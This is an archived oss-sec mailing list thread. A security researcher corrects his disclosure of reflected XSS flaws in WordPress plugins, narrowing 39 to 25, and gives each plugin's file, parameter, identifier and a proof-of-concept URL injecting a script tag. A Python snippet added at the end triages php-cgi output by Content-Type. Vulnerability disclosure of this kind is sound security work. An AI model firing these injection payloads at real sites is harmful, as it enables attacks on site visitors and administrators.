oss-sec mailing list archives

Re: 39 XSS vulnerabilities in 35 wordpress plugins.


From: "Larry W. Cashdollar" <larry0 () me com>
Date: Thu, 14 Apr 2016 13:07:58 -0400

Hi List,

This morning I realized a flaw in my testing methodology: I used php5-cgi on the command line, setting environment variables to pass the XSS payload to the vulnerable PHP code. What I failed to realize is that if the plugin code was setting a content header, this would be missed when I used phantomJS to render the HTML output and execute any JS I had injected. The result is that only 25 of the plugins are exploitable. The other 14 aren't XSSable because they set the content header to something the browser doesn't render. Here is a list of the remaining plugins. I'm sorry for my mistake.

Plugin:https://wordpress.org/plugins/indexisto File:./indexisto/assets/js/indexisto-inject.php Parameter:indexisto_index CVEID:2016-77360
PoC:hxxp://[target]/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/whizz File:./whizz/plugins/delete-plugin.php Parameter:plugin CVEID:2016-77799
PoC:hxxp://[target]/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/anti-plagiarism File:./anti-plagiarism/js.php Parameter:m CVEID:2016-77035
PoC:hxxp://[target]/wp-content/plugins/anti-plagiarism/js.php?m="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/s3-video File:./s3-video/views/video-management/preview_video.php Parameter:media CVEID:2016-77600
PoC:hxxp://[target]/wp-content/plugins/s3-video/views/video-management/preview_video.php?media="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/wpsolr-search-engine File:./wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php Parameter:page tab CVEID:2016-77958
PoC:hxxp://[target]/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/page-layout-builder File:./page-layout-builder/includes/layout-settings.php Parameter:layout_settings_id CVEID:2016-77503
PoC:hxxp://[target]/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/e-search File:./e-search/tmpl/date_select.php Parameter:date-from date-to CVEID:2016-77217
PoC:hxxp://[target]/wp-content/plugins/e-search/tmpl/date_select.php?date-from="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/e-search File:./e-search/tmpl/title_az.php Parameter:title_az CVEID:2016-77217
PoC:hxxp://[target]/wp-content/plugins/e-search/tmpl/title_az.php?title_az="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/tidio-gallery File:./tidio-gallery/popup-insert-help.php Parameter:galleryId id tidio-gallery CVEID:2016-77727
PoC:hxxp://[target]/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/parsi-font File:./parsi-font/css.php Parameter:font size CVEID:2016-77506
PoC:hxxp://[target]/wp-content/plugins/parsi-font/css.php?size="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/defa-online-image-protector File:./defa-online-image-protector/redirect.php Parameter:r CVEID:2016-77193
PoC:hxxp://[target]/wp-content/plugins/defa-online-image-protector/redirect.php?r="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/new-year-firework File:./new-year-firework/firework/index.php Parameter:music text url CVEID:2016-77475
PoC:hxxp://[target]/wp-content/plugins/new-year-firework/firework/index.php?text="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/simpel-reserveren File:./simpel-reserveren/edit.php Parameter:page CVEID:2016-77628
PoC:hxxp://[target]/wp-content/plugins/simpel-reserveren/edit.php?page="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/ajax-random-post File:./ajax-random-post/js.php Parameter:count interval CVEID:2016-77022
PoC:hxxp://[target]/wp-content/plugins/ajax-random-post/js.php?interval="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/admin-font-editor File:./admin-font-editor/css.php Parameter:font size CVEID:2016-77009
PoC:hxxp://[target]/wp-content/plugins/admin-font-editor/css.php?size="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/hdw-tube File:./hdw-tube/playlist.php Parameter:playlist CVEID:2016-77337
PoC:hxxp://[target]/wp-content/plugins/hdw-tube/playlist.php?playlist="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/hdw-tube File:./hdw-tube/mychannel.php Parameter:channel CVEID:2016-77337
PoC:hxxp://[target]/wp-content/plugins/hdw-tube/mychannel.php?channel="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/hero-maps-pro File:./hero-maps-pro/views/dashboard/index.php Parameter:p v CVEID:2016-77341
PoC:hxxp://[target]/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/photoxhibit File:./photoxhibit/common/inc/pages/edit_styles.php Parameter:gid CVEID:2016-77517
PoC:hxxp://[target]/wp-content/plugins/photoxhibit/common/inc/pages/edit_styles.php?gid="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/photoxhibit File:./photoxhibit/common/inc/pages/build.php Parameter:gid CVEID:2016-77517
PoC:hxxp://[target]/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/pondol-formmail File:./pondol-formmail/pages/admin-mail-info.php Parameter:itemid CVEID:2016-77532
PoC:hxxp://[target]/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/heat-trackr File:./heat-trackr/heat-trackr_abtest_add.php Parameter:id N WPSLT CVEID:2016-77339
PoC:hxxp://[target]/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/tidio-form File:./tidio-form/popup-insert-help.php Parameter:formId id tidio-form CVEID:2016-77726
PoC:hxxp://[target]/wp-content/plugins/tidio-form/popup-insert-help.php?formId="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/simplified-content File:./simplified-content/ooawpframework/js/ajax/OOAAjax.js.php Parameter:ajaxURL CVEID:2016-77642
PoC:hxxp://[target]/wp-content/plugins/simplified-content/ooawpframework/js/ajax/OOAAjax.js.php?ajaxURL="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/infusionsoft File:./infusionsoft/Infusionsoft/examples/leadscoring.php Parameter:ContactId CVEID:2016-77364
PoC:hxxp://[target]/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId="><script>alert(1);</script><"

Advisories here: http://www.vapidlabs.com/wp/wp.php


Again my apologies,
Larry


On Apr 12, 2016, at 8:48 AM, Larry W. Cashdollar <larry0 () me com> wrote:

Hello List,


This was a project I worked on as part of my research in Akamai's SIRT. I initially found 1352 suspect XSS vulnerabilities, but WordPress escapes the super globals GET/POST/REQUEST (https://core.trac.wordpress.org/ticket/18322). I didn't know this at the time, so now I have a database of vulnerabilities that are context dependent and would need to be examined individually. I managed to automate XSS testing against the database, and of the 1352, 39 successfully executed JavaScript. These are those 39; I've manually verified they're still vulnerable.

They're available here http://www.vapidlabs.com/wp/wp.php
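The correction at the top of this thread turns on one detail: php-cgi prints the script's headers before the body, and the content type in those headers decides whether a browser will render a reflected payload at all. As an added example (not code from Larry's posts), here is a small Python triage check that reads php-cgi's raw stdout, which the phantomJS step described above did not, and classifies a reflection by the declared Content-Type; the sample outputs are constructed, and the reflected string is the PoC payload from the advisory.

```python
import re

# Constructed samples of what php-cgi writes to stdout: CGI headers, a blank line,
# then the body. The reflected string is the PoC payload from the advisory.
PAYLOAD = '"><script>alert(1);</script><"'

# A css.php-style script that sets its own type: reflected, but not rendered as HTML.
CGI_OUTPUT_CSS = (
    "Content-type: text/css\r\n"
    "X-Powered-By: PHP/5.6\r\n"
    "\r\n"
    'body { font-size: "><script>alert(1);</script><" }\n'
)
# A script that sets no type: php-cgi emits its default text/html, so this one is XSS.
CGI_OUTPUT_HTML = (
    "Content-type: text/html; charset=UTF-8\r\n"
    "\r\n"
    '<input value=""><script>alert(1);</script><"">\n'
)
# Headerless output (constructed edge case): a browser may sniff the body as HTML.
CGI_OUTPUT_NO_HEADER = '\r\n<input value=""><script>alert(1);</script><"">\n'

HTML_TYPES = {"text/html", "application/xhtml+xml"}


def split_cgi_output(raw):
    """Split CGI stdout into (headers, body); the headers end at the first blank line."""
    m = re.search(r"\A\r?\n|\r?\n\r?\n", raw)
    head, body = (raw[:m.start()], raw[m.end():]) if m else (raw, "")
    headers = {}
    for line in head.splitlines():
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers, body


def classify_reflection(raw, payload=PAYLOAD):
    """Triage a scanner hit by the declared Content-Type instead of the body alone.

    'reflected-html'      -> payload lands in a document browsers render as HTML
    'reflected-not-html'  -> reflected, but into text/css, text/javascript, etc.
    'reflected-sniffable' -> reflected with no Content-Type and no nosniff
    'not-reflected'       -> the payload never reached the body
    """
    headers, body = split_cgi_output(raw)
    if payload not in body:
        return "not-reflected"
    ctype = headers.get("content-type")
    if ctype is None:
        nosniff = headers.get("x-content-type-options", "").lower() == "nosniff"
        return "reflected-not-html" if nosniff else "reflected-sniffable"
    media = ctype.split(";", 1)[0].strip().lower()
    return "reflected-html" if media in HTML_TYPES else "reflected-not-html"
```

Only the 'reflected-html' class corresponds to the 25 entries kept in the corrected list; the css.php and js.php style files in the original 39 fall into 'reflected-not-html'.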

